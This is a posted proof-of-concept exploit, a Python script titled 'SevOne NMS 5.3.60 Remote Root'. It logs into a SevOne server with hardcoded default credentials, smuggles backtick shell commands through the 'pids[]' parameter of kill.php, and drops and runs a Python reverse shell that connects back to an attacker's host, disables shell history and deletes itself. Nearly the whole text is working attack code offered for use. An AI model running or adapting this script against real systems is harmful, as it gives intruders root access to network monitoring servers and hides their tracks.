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SevOne NMS 5.3.60 Remote Root

Posted on 15 January 2016

#!/usr/bin/env python # Exploit Title: SevOne NMS <= reverse shell remote root # Date: 01/14/2016 # Exploit Author: @iamsecurity # Vendor Homepage: https://www.sevone.com/ # Software Link: https://www.sevone.com/download2/free/vimage/SevOne-Download.ova # Version: """sevone.py: Simple reverse root shell exploit for SevOne <= Details: http://russiansecurity.expert/2016/01/14/critical-security-issues-in-sevone-nms/ run: ./sevone.py "sevone_url" lhost lport """ import sys import requests __author__ = '@iamsecurity' def main(): if len(sys.argv) < 4: print('Enter url of SevOne PAS server and listen IP and PORT to connect back. Usage: ' + sys.argv[0] + ' "sevone_url" lhost lport Example: ./sevone.py 31337') sys.exit(1) requests.packages.urllib3.disable_warnings() url = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] login_url = url + "/doms/login/processLogin.php" rce_url = url + "/doms/discoveryqueue/kill.php" login = "SevOneStats" password = "n3v3rd13" s = requests.Session() s.verify = False payload = [ '`echo 'import os; import pty; import socket; lhost="'+lhost+'"; lport='+lport+'; s=socket.socket(socket.AF_IN' 'ET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fi' 'leno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close()' | dd of=/tmp/sess_ap6k1d1ucb' 'etfk9fhcqdnk0be5`', '`python /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5; rm -rf /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5`' ] s.post(login_url, {'login': login, 'passwd': password, 'tzString': 1}) s.post(rce_url, {'pids[]': payload[0]}) try: s.post(rce_url, {'pids[]': payload[1]}, timeout=0.001) except requests.exceptions.ReadTimeout: print("Don't need wait for response from server. Exploit successfully!") pass if __name__ == "__main__": main()